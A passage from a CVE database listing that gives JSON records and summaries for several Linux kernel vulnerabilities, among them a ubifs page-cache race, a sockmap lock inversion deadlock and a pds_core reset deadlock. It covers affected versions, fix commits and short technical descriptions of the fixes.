            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8f599ab6fabbca4c741107eade70722a98adfd9f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f19b1023a3758f40791ec166038d6411c8894ae3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/142d87c958d9454c3cffa625fab56f3016e8f9f3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fc99f4e2d2f1ce766c14e98463c2839194ae964f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4b7c4fc60d6a46350fbe54f5dc937aeaa02e675e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/17772bbe9cfa972ea1ff827319f6e1340de76566"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/723012cab779eee8228376754e22c6594229bf8f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/ubifs/file.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "4aa554832b9dc9e66249df75b8f447d87853e12e",
              "status": "affected",
              "version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
              "versionType": "git"
            },
            {
              "lessThan": "778c6ad40256f1c03244fc06d7cdf71f6b5e7310",
              "status": "affected",
              "version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
              "versionType": "git"
            },
            {
              "lessThan": "8f599ab6fabbca4c741107eade70722a98adfd9f",
              "status": "affected",
              "version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
              "versionType": "git"
            },
            {
              "lessThan": "f19b1023a3758f40791ec166038d6411c8894ae3",
              "status": "affected",
              "version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
              "versionType": "git"
            },
            {
              "lessThan": "142d87c958d9454c3cffa625fab56f3016e8f9f3",
              "status": "affected",
              "version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
              "versionType": "git"
            },
            {
              "lessThan": "fc99f4e2d2f1ce766c14e98463c2839194ae964f",
              "status": "affected",
              "version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
              "versionType": "git"
            },
            {
              "lessThan": "4b7c4fc60d6a46350fbe54f5dc937aeaa02e675e",
              "status": "affected",
              "version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
              "versionType": "git"
            },
            {
              "lessThan": "17772bbe9cfa972ea1ff827319f6e1340de76566",
              "status": "affected",
              "version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
              "versionType": "git"
            },
            {
              "lessThan": "723012cab779eee8228376754e22c6594229bf8f",
              "status": "affected",
              "version": "1e51764a3c2ac05a23a22b2a95ddee4d9bffb16d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/ubifs/file.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.27"
            },
            {
              "lessThan": "2.6.27",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nubifs: Set page uptodate in the correct place\n\nPage cache reads are lockless, so setting the freshly allocated page\nuptodate before we\u0027ve overwritten it with the data it\u0027s supposed to have\nin it will allow a simultaneous reader to see old data.  Move the call\nto SetPageUptodate into ubifs_write_end(), which is after we copied the\nnew data into the page."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:06:08.823Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/4aa554832b9dc9e66249df75b8f447d87853e12e"
        },
        {
          "url": "https://git.kernel.org/stable/c/778c6ad40256f1c03244fc06d7cdf71f6b5e7310"
        },
        {
          "url": "https://git.kernel.org/stable/c/8f599ab6fabbca4c741107eade70722a98adfd9f"
        },
        {
          "url": "https://git.kernel.org/stable/c/f19b1023a3758f40791ec166038d6411c8894ae3"
        },
        {
          "url": "https://git.kernel.org/stable/c/142d87c958d9454c3cffa625fab56f3016e8f9f3"
        },
        {
          "url": "https://git.kernel.org/stable/c/fc99f4e2d2f1ce766c14e98463c2839194ae964f"
        },
        {
          "url": "https://git.kernel.org/stable/c/4b7c4fc60d6a46350fbe54f5dc937aeaa02e675e"
        },
        {
          "url": "https://git.kernel.org/stable/c/17772bbe9cfa972ea1ff827319f6e1340de76566"
        },
        {
          "url": "https://git.kernel.org/stable/c/723012cab779eee8228376754e22c6594229bf8f"
        }
      ],
      "title": "ubifs: Set page uptodate in the correct place",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35821",
    "datePublished": "2024-05-17T13:23:24.350Z",
    "dateReserved": "2024-05-17T12:19:12.345Z",
    "dateUpdated": "2025-05-04T09:06:08.823Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35895 (GCVE-0-2024-35895)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2025-05-04 09:07

Title

bpf, sockmap: Prevent lock inversion deadlock in map delete elem

Summary

In the Linux kernel, the following vulnerability has been resolved: bpf, sockmap: Prevent lock inversion deadlock in map delete elem syzkaller started using corpuses where a BPF tracing program deletes elements from a sockmap/sockhash map. Because BPF tracing programs can be invoked from any interrupt context, locks taken during a map_delete_elem operation must be hardirq-safe. Otherwise a deadlock due to lock inversion is possible, as reported by lockdep: CPU0 CPU1 ---- ---- lock(&htab->buckets[i].lock); local_irq_disable(); lock(&host->lock); lock(&htab->buckets[i].lock); <Interrupt> lock(&host->lock); Locks in sockmap are hardirq-unsafe by design. We expects elements to be deleted from sockmap/sockhash only in task (normal) context with interrupts enabled, or in softirq context. Detect when map_delete_elem operation is invoked from a context which is _not_ hardirq-unsafe, that is interrupts are disabled, and bail out with an error. Note that map updates are not affected by this issue. BPF verifier does not allow updating sockmap/sockhash from a BPF tracing program today.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f7990498b05ac41f7…
	https://git.kernel.org/stable/c/dd54b48db0c822ae7…
	https://git.kernel.org/stable/c/d1e73fb19a4c872d7…
	https://git.kernel.org/stable/c/a44770fed86515eed…
	https://git.kernel.org/stable/c/668b3074aa14829e2…
	https://git.kernel.org/stable/c/6af057ccdd8e76199…
	https://git.kernel.org/stable/c/ff91059932401894e…

Impacted products

Vendor

Product

Version

Linux

Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < f7990498b05ac41f7d6a190dc0418ef1d21bf058 (git)
Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < dd54b48db0c822ae7b520bc80751f0a0a173ef75 (git)
Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < d1e73fb19a4c872d7a399ad3c66e8ca30e0875ec (git)
Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < a44770fed86515eedb5a7c00b787f847ebb134a5 (git)
Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < 668b3074aa14829e2ac2759799537a93b60fef86 (git)
Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < 6af057ccdd8e7619960aca1f0428339f213b31cd (git)
Affected: 604326b41a6fb9b4a78b6179335decee0365cd8c , < ff91059932401894e6c86341915615c5eb0eca48 (git)

Linux

Affected: 4.20
Unaffected: 0 , < 4.20 (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.85 , ≤ 6.1.* (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35895",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-23T19:25:39.256006Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:48.419Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.577Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f7990498b05ac41f7d6a190dc0418ef1d21bf058"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dd54b48db0c822ae7b520bc80751f0a0a173ef75"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d1e73fb19a4c872d7a399ad3c66e8ca30e0875ec"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a44770fed86515eedb5a7c00b787f847ebb134a5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/668b3074aa14829e2ac2759799537a93b60fef86"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6af057ccdd8e7619960aca1f0428339f213b31cd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ff91059932401894e6c86341915615c5eb0eca48"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/core/sock_map.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f7990498b05ac41f7d6a190dc0418ef1d21bf058",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            },
            {
              "lessThan": "dd54b48db0c822ae7b520bc80751f0a0a173ef75",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            },
            {
              "lessThan": "d1e73fb19a4c872d7a399ad3c66e8ca30e0875ec",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            },
            {
              "lessThan": "a44770fed86515eedb5a7c00b787f847ebb134a5",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            },
            {
              "lessThan": "668b3074aa14829e2ac2759799537a93b60fef86",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            },
            {
              "lessThan": "6af057ccdd8e7619960aca1f0428339f213b31cd",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            },
            {
              "lessThan": "ff91059932401894e6c86341915615c5eb0eca48",
              "status": "affected",
              "version": "604326b41a6fb9b4a78b6179335decee0365cd8c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/core/sock_map.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.20"
            },
            {
              "lessThan": "4.20",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.85",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.85",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.20",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf, sockmap: Prevent lock inversion deadlock in map delete elem\n\nsyzkaller started using corpuses where a BPF tracing program deletes\nelements from a sockmap/sockhash map. Because BPF tracing programs can be\ninvoked from any interrupt context, locks taken during a map_delete_elem\noperation must be hardirq-safe. Otherwise a deadlock due to lock inversion\nis possible, as reported by lockdep:\n\n       CPU0                    CPU1\n       ----                    ----\n  lock(\u0026htab-\u003ebuckets[i].lock);\n                               local_irq_disable();\n                               lock(\u0026host-\u003elock);\n                               lock(\u0026htab-\u003ebuckets[i].lock);\n  \u003cInterrupt\u003e\n    lock(\u0026host-\u003elock);\n\nLocks in sockmap are hardirq-unsafe by design. We expects elements to be\ndeleted from sockmap/sockhash only in task (normal) context with interrupts\nenabled, or in softirq context.\n\nDetect when map_delete_elem operation is invoked from a context which is\n_not_ hardirq-unsafe, that is interrupts are disabled, and bail out with an\nerror.\n\nNote that map updates are not affected by this issue. BPF verifier does not\nallow updating sockmap/sockhash from a BPF tracing program today."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:07:50.310Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f7990498b05ac41f7d6a190dc0418ef1d21bf058"
        },
        {
          "url": "https://git.kernel.org/stable/c/dd54b48db0c822ae7b520bc80751f0a0a173ef75"
        },
        {
          "url": "https://git.kernel.org/stable/c/d1e73fb19a4c872d7a399ad3c66e8ca30e0875ec"
        },
        {
          "url": "https://git.kernel.org/stable/c/a44770fed86515eedb5a7c00b787f847ebb134a5"
        },
        {
          "url": "https://git.kernel.org/stable/c/668b3074aa14829e2ac2759799537a93b60fef86"
        },
        {
          "url": "https://git.kernel.org/stable/c/6af057ccdd8e7619960aca1f0428339f213b31cd"
        },
        {
          "url": "https://git.kernel.org/stable/c/ff91059932401894e6c86341915615c5eb0eca48"
        }
      ],
      "title": "bpf, sockmap: Prevent lock inversion deadlock in map delete elem",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35895",
    "datePublished": "2024-05-19T08:34:50.276Z",
    "dateReserved": "2024-05-17T13:50:33.113Z",
    "dateUpdated": "2025-05-04T09:07:50.310Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35968 (GCVE-0-2024-35968)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:41 – Updated: 2025-05-04 09:09

Title

pds_core: Fix pdsc_check_pci_health function to use work thread

Summary

In the Linux kernel, the following vulnerability has been resolved: pds_core: Fix pdsc_check_pci_health function to use work thread When the driver notices fw_status == 0xff it tries to perform a PCI reset on itself via pci_reset_function() in the context of the driver's health thread. However, pdsc_reset_prepare calls pdsc_stop_health_thread(), which attempts to stop/flush the health thread. This results in a deadlock because the stop/flush will never complete since the driver called pci_reset_function() from the health thread context. Fix by changing the pdsc_check_pci_health_function() to queue a newly introduced pdsc_pci_reset_thread() on the pdsc's work queue. Unloading the driver in the fw_down/dead state uncovered another issue, which can be seen in the following trace: WARNING: CPU: 51 PID: 6914 at kernel/workqueue.c:1450 __queue_work+0x358/0x440 [...] RIP: 0010:__queue_work+0x358/0x440 [...] Call Trace: <TASK> ? __warn+0x85/0x140 ? __queue_work+0x358/0x440 ? report_bug+0xfc/0x1e0 ? handle_bug+0x3f/0x70 ? exc_invalid_op+0x17/0x70 ? asm_exc_invalid_op+0x1a/0x20 ? __queue_work+0x358/0x440 queue_work_on+0x28/0x30 pdsc_devcmd_locked+0x96/0xe0 [pds_core] pdsc_devcmd_reset+0x71/0xb0 [pds_core] pdsc_teardown+0x51/0xe0 [pds_core] pdsc_remove+0x106/0x200 [pds_core] pci_device_remove+0x37/0xc0 device_release_driver_internal+0xae/0x140 driver_detach+0x48/0x90 bus_remove_driver+0x6d/0xf0 pci_unregister_driver+0x2e/0xa0 pdsc_cleanup_module+0x10/0x780 [pds_core] __x64_sys_delete_module+0x142/0x2b0 ? syscall_trace_enter.isra.18+0x126/0x1a0 do_syscall_64+0x3b/0x90 entry_SYSCALL_64_after_hwframe+0x72/0xdc RIP: 0033:0x7fbd9d03a14b [...] Fix this by preventing the devcmd reset if the FW is not running.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/38407914d48273d7f…
	https://git.kernel.org/stable/c/81665adf25d28a00a…

Impacted products

Vendor

Product

Version

Linux

Affected: 1e18ec3e9d46e4ad2b6507c3bfc7f59e2ab449a2 , < 38407914d48273d7f8ab765b9243658afe1c3ab6 (git)
Affected: 1e18ec3e9d46e4ad2b6507c3bfc7f59e2ab449a2 , < 81665adf25d28a00a986533f1d3a5df76b79cad9 (git)

Linux

Affected: 6.7
Unaffected: 0 , < 6.7 (semver)
Unaffected: 6.8.7 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35968",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-21T15:11:50.638119Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:48.818Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.041Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/38407914d48273d7f8ab765b9243658afe1c3ab6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/81665adf25d28a00a986533f1d3a5df76b79cad9"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/amd/pds_core/core.c",
            "drivers/net/ethernet/amd/pds_core/core.h",
            "drivers/net/ethernet/amd/pds_core/dev.c",
            "drivers/net/ethernet/amd/pds_core/main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "38407914d48273d7f8ab765b9243658afe1c3ab6",
              "status": "affected",
              "version": "1e18ec3e9d46e4ad2b6507c3bfc7f59e2ab449a2",
              "versionType": "git"
            },
            {
              "lessThan": "81665adf25d28a00a986533f1d3a5df76b79cad9",
              "status": "affected",
              "version": "1e18ec3e9d46e4ad2b6507c3bfc7f59e2ab449a2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/amd/pds_core/core.c",
            "drivers/net/ethernet/amd/pds_core/core.h",
            "drivers/net/ethernet/amd/pds_core/dev.c",
            "drivers/net/ethernet/amd/pds_core/main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.7"
            },
            {
              "lessThan": "6.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.7",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\npds_core: Fix pdsc_check_pci_health function to use work thread\n\nWhen the driver notices fw_status == 0xff it tries to perform a PCI\nreset on itself via pci_reset_function() in the context of the driver\u0027s\nhealth thread. However, pdsc_reset_prepare calls\npdsc_stop_health_thread(), which attempts to stop/flush the health\nthread. This results in a deadlock because the stop/flush will never\ncomplete since the driver called pci_reset_function() from the health\nthread context. Fix by changing the pdsc_check_pci_health_function()\nto queue a newly introduced pdsc_pci_reset_thread() on the pdsc\u0027s\nwork queue.\n\nUnloading the driver in the fw_down/dead state uncovered another issue,\nwhich can be seen in the following trace:\n\nWARNING: CPU: 51 PID: 6914 at kernel/workqueue.c:1450 __queue_work+0x358/0x440\n[...]\nRIP: 0010:__queue_work+0x358/0x440\n[...]\nCall Trace:\n \u003cTASK\u003e\n ? __warn+0x85/0x140\n ? __queue_work+0x358/0x440\n ? report_bug+0xfc/0x1e0\n ? handle_bug+0x3f/0x70\n ? exc_invalid_op+0x17/0x70\n ? asm_exc_invalid_op+0x1a/0x20\n ? __queue_work+0x358/0x440\n queue_work_on+0x28/0x30\n pdsc_devcmd_locked+0x96/0xe0 [pds_core]\n pdsc_devcmd_reset+0x71/0xb0 [pds_core]\n pdsc_teardown+0x51/0xe0 [pds_core]\n pdsc_remove+0x106/0x200 [pds_core]\n pci_device_remove+0x37/0xc0\n device_release_driver_internal+0xae/0x140\n driver_detach+0x48/0x90\n bus_remove_driver+0x6d/0xf0\n pci_unregister_driver+0x2e/0xa0\n pdsc_cleanup_module+0x10/0x780 [pds_core]\n __x64_sys_delete_module+0x142/0x2b0\n ? syscall_trace_enter.isra.18+0x126/0x1a0\n do_syscall_64+0x3b/0x90\n entry_SYSCALL_64_after_hwframe+0x72/0xdc\nRIP: 0033:0x7fbd9d03a14b\n[...]\n\nFix this by preventing the devcmd reset if the FW is not running."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:09:26.795Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/38407914d48273d7f8ab765b9243658afe1c3ab6"
        },
        {
          "url": "https://git.kernel.org/stable/c/81665adf25d28a00a986533f1d3a5df76b79cad9"
        }
      ],
      "title": "pds_core: Fix pdsc_check_pci_health function to use work thread",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35968",
    "datePublished": "2024-05-20T09:41:57.162Z",
    "dateReserved": "2024-05-17T13:50:33.140Z",
    "dateUpdated": "2025-05-04T09:09:26.795Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35975 (GCVE-0-2024-35975)

